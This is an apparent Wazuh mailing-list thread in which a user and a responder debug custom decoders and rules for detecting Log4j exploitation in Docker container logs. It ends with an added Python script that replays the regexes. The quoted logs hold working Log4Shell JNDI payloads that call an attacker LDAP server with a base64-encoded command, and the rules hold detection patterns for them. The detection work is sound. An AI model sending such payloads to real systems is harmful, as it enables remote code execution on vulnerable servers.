Log4j ruleset detection


Iman Mikhael

Dec 18, 2022, 5:09:14 AM
to Wazuh mailing list
Hello, 

I have configured rules and a decoder to detect the Log4j exploit on a docker container. However, there are no events received on the Wazuh dashboard. When I used 'tail' and logtest on the Wazuh manager, it shows that the logs have been received and decoded. This is the output of logtest:

**Phase 1: Completed pre-decoding.
full event: 'Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}'
timestamp: 'Dec 18 17:54:00'
hostname: 'goldmouf-virtual-machine'
program_name: 'docker/vulnerable-app'

**Phase 2: Completed decoding.
name: 'docker_log_decoder'
date: '//192'
srcip: '192.168.36.129'
time: '09:54:00'

This shows that the ruleset did not detect the event, right?

Thank You, Regards.

Julian Bustamante Narvaez

Dec 18, 2022, 3:34:13 PM
to Wazuh mailing list
Hi, I hope you are well. Can you tell me what version of Wazuh you use?
Can you send me the ossec.conf file and the rules and decoders you have configured?

You can also send me the complete full log that you use for the test in the logtest.

Did you use any guide like this to configure Log4j?
Regards

Iman Mikhael

Dec 18, 2022, 9:26:23 PM
to Wazuh mailing list
Hi Julian, Thank you for responding,

I am using Wazuh version 4.3.10 using the OVA installation. In the ossec.conf file on my agent, I added this: 

<localfile>
  <log_format>syslog</log_format>
  <location>/var/log/docker/*</location>
</localfile>

In the ossec.conf file of the Wazuh manager the only change I made is setting 'logall_json' from no to yes; the rest is default:

<logall_json>yes</logall_json>

The rule I have configured is exactly the one from the link you gave:

<group name="log4j, attack,">
  <rule id="110002" level="7">
    <if_group>web|accesslog|attack</if_group>
    <regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
    <description>Possible Log4j RCE attack attempt detected.</description>
    <mitre>
      <id>T1190</id>
      <id>T1210</id>
      <id>T1211</id>
    </mitre>
  </rule>

  <rule id="110003" level="12">
    <if_sid>110002</if_sid>
    <regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
    <description>Log4j RCE attack attempt detected.</description>
    <mitre>
      <id>T1190</id>
      <id>T1210</id>
      <id>T1211</id>
    </mitre>
  </rule>
</group>

The decoders I have configured are from this link https://wazuh.com/blog/monitoring-docker-container-logs-with-wazuh/ :

<decoder name="docker_log_decoder">
  <program_name>^docker</program_name>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d*.\d*.\d*.\d*)</regex>
  <order>srcip</order>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d*/\w*/\d*)</regex>
  <order>date</order>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d*:\d*:\d*)</regex>
  <order>time</order>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">("\w*\s/\s\w*/\d.\d"\s\d*)</regex>
  <order>web_action</order>
</decoder>

The full log I used for the logtest is:

Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}

Some additional info: I also tested using:


And you can see the results in the images attached. Hope to hear from you soon.

Thank you, Regards.
Ruleset Test Webser Log4j.jpg
Ruleset Test POC Log4j.jpg

Julian Bustamante Narvaez

Dec 19, 2022, 6:12:14 PM
to Wazuh mailing list
Hi, testing with the decoders and rules you sent me, I couldn't get TEST WEB SERVER or TEST POC to work. Not being able to replicate the one that works for you, I couldn't see what decoder and rule you use to match via web|accesslog|attack.

Do I need an additional decoder or rule?

Can you try the logtest with the -v flag and send me your output?

I also saw that the date is wrong, because the logs are different and they need different decoders. I leave you a possible solution.

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d+/\w+/\d+)</regex>
  <order>date</order>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d+-\w+-\d+)</regex>
  <order>date</order>
</decoder>

Can you send me the full log that works?

Please send me everything in text and not just in images.
Regards
Screenshot from 2022-12-19 18-10-31.png
Screenshot from 2022-12-19 18-09-02.png

Iman Mikhael

Dec 23, 2022, 4:39:11 AM
to Wazuh mailing list
Hi Julian,

Sorry for the late response, I have been busy with exams. Firstly, I only run the logtest from the UI because I cannot paste strings from an external source into the manager's CLI.

This is the full log that triggered the Log4j rule:

192.168.36.1 - - [23/Dec/2022:17:22:17 +0800] "GET /favicon.ico HTTP/1.1" 404 492 "http://192.168.36.135/?x=${jndi:ldap://${localhost}.{{test}}/a}" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

This is the output of the logtest of the log above:

**Phase 1: Completed pre-decoding.
full event: '192.168.36.1 - - [23/Dec/2022:17:22:17 +0800] "GET /favicon.ico HTTP/1.1" 404 492 "http://192.168.36.135/?x=${jndi:ldap://${localhost}.{{test}}/a}" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"'

**Phase 2: Completed decoding.
name: 'web-accesslog'
id: '404'
protocol: 'GET'
srcip: '192.168.36.1'
url: '/favicon.ico'

**Phase 3: Completed filtering (rules).
id: '110003'
level: '12'
description: 'Log4j RCE attack attempt detected.'
groups: '["log4j"," attack"]'
firedtimes: '1'
mail: 'true'
mitre.id: '["T1190","T1210","T1211"]'
mitre.tactic: '["Initial Access","Lateral Movement","Defense Evasion"]'
mitre.technique: '["Exploit Public-Facing Application","Exploitation of Remote Services","Exploitation for Defense Evasion"]'
**Alert to be generated.

This is the decoder in 0375-web-accesslog_decoders.xml that matched with the log:

<decoder name="web-accesslog">
    <type>web-log</type>
    <program_name>nginx|apache</program_name>
</decoder>

<decoder name="web-accesslog">
    <type>web-log</type>
    <prematch>^\S+ \S+ \S+ \.*[\S+ \S\d+] "\w+ \S+ HTTP\S+" </prematch>
</decoder>

<decoder name="web-accesslog-domain">
    <type>web-log</type>
    <parent>web-accesslog</parent>
    <prematch>^\S+.\D+</prematch>
    <regex>^\S+ (\S+) \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
    <order>srcip, protocol, url, id</order>
</decoder>

<decoder name="web-accesslog-ip-ip">
    <type>web-log</type>
    <parent>web-accesslog</parent>
    <prematch>^\S+ \S+.\S+ |^\S+ \S+:\S+ </prematch>
    <regex>^(\S+) (\S+) \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
    <order>srcip2, srcip, protocol, url, id</order>
</decoder>

<decoder name="web-accesslog-ip">
    <type>web-log</type>
    <parent>web-accesslog</parent>
    <regex>^(\S+) \S+ \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
    <order>srcip, protocol, url, id</order>
</decoder>

<decoder name="web-accesslog-glpi">
    <type>web-log</type>
    <parent>web-accesslog</parent>
    <prematch>^\S+ - - [\d+/\w+/\d+:\d+:\d+:\d+ +\d+] "\S+ \S+ HTTP/\.+"</prematch>
    <regex>^(\S+) - - [(\d+/\w+/\d+:\d+:\d+:\d+) +\d+] "(\S+) (\S+) HTTP/(\.+)" (\d+) (\S+) "(\.+)" "(\.+)"</regex>
    <order>srcip,timestamp,operation, route, http_version, rcode, rsize, url, browser</order>
</decoder>

Meanwhile, the full log below is from a Log4j exploit which was successful (remote code execution was carried out), but the rule was not triggered.

This is the full log that did not trigger the rule:

Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}

This is the output of the logtest of the log above:

**Messages:
WARNING: (7003): '507fa2da' token expires
INFO: (7202): Session initialized with token '2da14981'

**Phase 1: Completed pre-decoding.
full event: 'Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}'
timestamp: 'Dec 18 17:54:00'
hostname: 'goldmouf-virtual-machine'
program_name: 'docker/vulnerable-app'

**Phase 2: Completed decoding.
name: 'docker_log_decoder'
date: '2022-12-18'
srcip: '192.168.36.129'
time: '09:54:00'

This is the decoder written in local_decoder.xml that matched with the full log but did not trigger the rule:

<decoder name="docker_log_decoder">
  <program_name>^docker</program_name>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d*.\d*.\d*.\d*)</regex>
  <order>srcip</order>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d+-\w+-\d+)</regex>
  <order>date</order>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">(\d*:\d*:\d*)</regex>
  <order>time</order>
</decoder>

<decoder name="docker_log_decoder_2">
  <parent>docker_log_decoder</parent>
  <regex offset="after_parent">("\w*\s/\s\w*/\d.\d"\s\d*)</regex>
  <order>web_action</order>
</decoder>

This is the rule written in local_rules.xml that triggered on the web server exploit but not on the docker container:

<group name="log4j, attack,">
  <rule id="110002" level="7">
    <if_group>web|accesslog|attack</if_group>
    <regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
    <description>Possible Log4j RCE attack attempt detected.</description>
    <mitre>
      <id>T1190</id>
      <id>T1210</id>
      <id>T1211</id>
    </mitre>
  </rule>

  <rule id="110003" level="12">
    <if_sid>110002</if_sid>
    <regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
    <description>Log4j RCE attack attempt detected.</description>
    <mitre>
      <id>T1190</id>
      <id>T1210</id>
      <id>T1211</id>
    </mitre>
  </rule>
</group>

The exploit that I am trying to get alerts for on Wazuh is exactly the one in this link: https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/

Regards,

Julian Bustamante Narvaez

Dec 26, 2022, 2:26:22 PM
to Iman Mikhael, Wazuh mailing list
Hi,
The alert is not generated because the if_group is not set: the group is assigned by a rule, so you have to create another rule and assign the group in it.

<group name="log4j, attack,">
  <rule id="110001" level="0">
    <decoded_as>docker_log_decoder</decoded_as>
    <group>web</group>
    <description>custom docker log decoder</description>
  </rule>

  <rule id="110002" level="7">
    <if_group>web|accesslog|attack</if_group>
    <regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
    <description>Possible Log4j RCE attack attempt detected.</description>
    <mitre>
      <id>T1190</id>
      <id>T1210</id>
      <id>T1211</id>
    </mitre>
  </rule>

  <rule id="110003" level="12">
    <if_sid>110002</if_sid>
    <regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
    <description>Log4j RCE attack attempt detected.</description>
    <mitre>
      <id>T1190</id>
      <id>T1210</id>
      <id>T1211</id>
    </mitre>
  </rule>
</group>
After restarting the manager, the output of the logtest is:

# /var/ossec/bin/wazuh-logtest
Starting wazuh-logtest v4.5.0
Type one log per line


Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}

**Phase 1: Completed pre-decoding.
full event: 'Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}'
timestamp: 'Dec 18 17:54:00'
hostname: 'goldmouf-virtual-machine'
program_name: 'docker/vulnerable-app'

**Phase 2: Completed decoding.
name: 'docker_log_decoder'
date: '2022-12-18'
srcip: '192.168.36.129'
time: '09:54:00'

**Phase 3: Completed filtering (rules).
id: '110003'
level: '12'
description: 'Log4j RCE attack attempt detected.'
groups: '['log4j', ' attack']'
firedtimes: '1'
mail: 'True'

mitre.id: '['T1190', 'T1210', 'T1211']'
mitre.tactic: '['Initial Access', 'Lateral Movement', 'Defense Evasion']'
mitre.technique: '['Exploit Public-Facing Application', 'Exploitation of Remote Services', 'Exploitation for Defense Evasion']'
**Alert to be generated.



Using the -v flag (/var/ossec/bin/wazuh-logtest -v) you can see that the sequence is as follows:
Trying rule: 110001 - custom docker log decoder
*Rule 110001 matched
*Trying child rules
Trying rule: 110002 - Possible Log4j RCE attack attempt detected.
*Rule 110002 matched
*Trying child rules
Trying rule: 110003 - Log4j RCE attack attempt detected.
*Rule 110003 matched

I hope this was useful.
Regards

Screenshot from 2022-12-26 14-21-20.png

Iman Mikhael

Dec 29, 2022, 10:42:43 PM
to Julian Bustamante Narvaez, Wazuh mailing list
Hello Julian,

I tested it and it works! This was very useful. However, I would like to know more about the lines of code you added in the ruleset. Is it to direct the rule to the docker log decoder?

Regards.

Julian Bustamante Narvaez

Jan 16, 2023, 7:59:33 AM
to Wazuh mailing list
Hi, sorry for the late reply; I was away for a few days.

Yes, the first stage is

<decoder name="docker_log_decoder">
  <program_name>^docker</program_name>
</decoder>

If it matches, the event is decoded with docker_log_decoder, rule 110001 starts and sets the group. Its level is 0, so no alert is generated, but it allows rule 110002 to start, which will generate the alert.


<rule id="110001" level="0">
  <decoded_as>docker_log_decoder</decoded_as>
  <group>web</group>
  <description>custom docker log decoder</description>
</rule>

Regards.
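As an added illustration of the two technical points in this thread (the date decoder correction in the Dec 19 reply, and the level-0 "bridge" rule 110001 explained above), here is a small Python script that is not part of the thread and not Wazuh code. It re-runs the thread's decoder and rule regexes with Python's re module over constructed copies of the two logs, and models the rule chain (decoded_as, then group, then if_group, then if_sid) in a few lines. Assumptions: the base64 payload of the docker log is shortened; OS_Regex's bare "." (a literal dot in decoders) is written as "\." for Python; the stock web-accesslog rules are represented simply by passing the groups "web" and "accesslog" as input; and Python's re is assumed to treat these particular pcre2 patterns the same way.

```python
import re

# Constructed sample inputs, modelled on the two logs in the thread (the
# base64 payload of the docker log is shortened to "/a").
DOCKER_LOG = (
    "Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: "
    "2022-12-18 09:54:00.434  INFO 1 --- [nio-8080-exec-2] HelloWorld : "
    "Received a request for API version ${jndi:ldap://192.168.36.129:1389/a}"
)
WEB_LOG = (
    '192.168.36.1 - - [23/Dec/2022:17:22:17 +0800] "GET /favicon.ico HTTP/1.1" '
    '404 492 "http://192.168.36.135/?x=${jndi:ldap://${localhost}.{{test}}/a}" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/108.0.0.0 Safari/537.36"'
)

# Decoder regexes from the thread.  Wazuh decoders use OS_Regex, where a bare
# "." is a literal dot (the thread's srcip output '192.168.36.129' shows that),
# so the IP pattern is written with "\." for Python's re module (assumption).
DATE_ORIGINAL = re.compile(r"(\d*/\w*/\d*)")  # from the blog; gave '//192'
DATE_FIXED = re.compile(r"(\d+-\w+-\d+)")     # Julian's replacement
TIME = re.compile(r"(\d*:\d*:\d*)")
SRCIP = re.compile(r"(\d*\.\d*\.\d*\.\d*)")

# Rule regexes from rules 110002 and 110003 (type="pcre2" in Wazuh); Python's
# re is assumed to handle these particular patterns identically.
RX_110002 = re.compile(r"(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)")
RX_110003 = re.compile(r"ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+")


def after_parent(log):
    """Text the child decoders see with offset="after_parent": everything
    after the 'program[pid]: ' prefix that docker_log_decoder matched."""
    return log.split("]: ", 1)[1]


def decode_docker(log, date_regex=DATE_FIXED):
    """Mimic the docker_log_decoder_2 siblings: each one searches the
    after-parent text and captures a single field."""
    body = after_parent(log)
    fields = {}
    for name, rx in (("date", date_regex), ("srcip", SRCIP), ("time", TIME)):
        m = rx.search(body)
        if m:
            fields[name] = m.group(1)
    return fields


def evaluate(log, decoder, groups, bridge_rule):
    """Simplified model of the rule chain in the thread.  A rule with
    <if_group> is only tried once an earlier rule has put the event in that
    group, and an <if_sid> child is tried only after its parent matched.
    Returns the ids of the rules that matched, in order."""
    matched = []
    groups = set(groups)
    # Rule 110001 (level 0): <decoded_as>docker_log_decoder</decoded_as> and
    # <group>web</group>.  It never alerts; it only tags the event.
    if bridge_rule and decoder == "docker_log_decoder":
        matched.append(110001)
        groups.add("web")
    # Rule 110002: <if_group>web|accesslog|attack</if_group> plus the jndi regex.
    if groups & {"web", "accesslog", "attack"} and RX_110002.search(log):
        matched.append(110002)
        # Rule 110003: <if_sid>110002</if_sid> plus the protocol regex.
        if RX_110003.search(log):
            matched.append(110003)
    return matched


if __name__ == "__main__":
    print("original date decoder:", decode_docker(DOCKER_LOG, DATE_ORIGINAL))
    print("fixed date decoder:   ", decode_docker(DOCKER_LOG))
    print("docker log, no bridge rule:", evaluate(DOCKER_LOG, "docker_log_decoder", [], False))
    print("docker log, with 110001:   ", evaluate(DOCKER_LOG, "docker_log_decoder", [], True))
    print("web log (stock web group): ", evaluate(WEB_LOG, "web-accesslog", ["web", "accesslog"], False))
```

The script reproduces the thread's '//192' date with the original `(\d*/\w*/\d*)` pattern (every quantifier may match empty, so the first "/" in "ldap://" satisfies it) and '2022-12-18' with the corrected one. It also shows that both rule regexes match the docker log just as well as the web log: the only thing that keeps rule 110002 from being tried is that no rule has put the docker event into a group named in its if_group, which is exactly what the level-0 rule 110001 supplies.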